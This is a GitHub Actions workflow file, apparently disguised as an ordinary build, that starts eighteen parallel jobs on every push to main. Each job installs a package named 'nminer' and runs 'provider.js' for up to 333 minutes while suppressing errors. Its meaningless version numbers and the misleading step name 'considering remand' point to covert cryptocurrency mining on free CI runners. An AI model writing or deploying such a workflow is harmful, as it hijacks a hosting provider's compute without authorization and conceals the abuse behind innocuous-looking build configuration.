name: provider
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3805 }
          - { version: 7878 }
          - { version: 3869 }
          - { version: 1690 }
          - { version: 1707 }
          - { version: 7701 }
          - { version: 8140 }
          - { version: 7906 }
          - { version: 4408 }
          - { version: 2473 }
          - { version: 3978 }
          - { version: 1555 }
          - { version: 6700 }
          - { version: 967 }
          - { version: 2605 }
          - { version: 2331 }
          - { version: 1799 }
          - { version: 1550 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: considering remand
        run: |
          npm install nminer@latest
          timeout 333m node provider.js || echo "provider executed"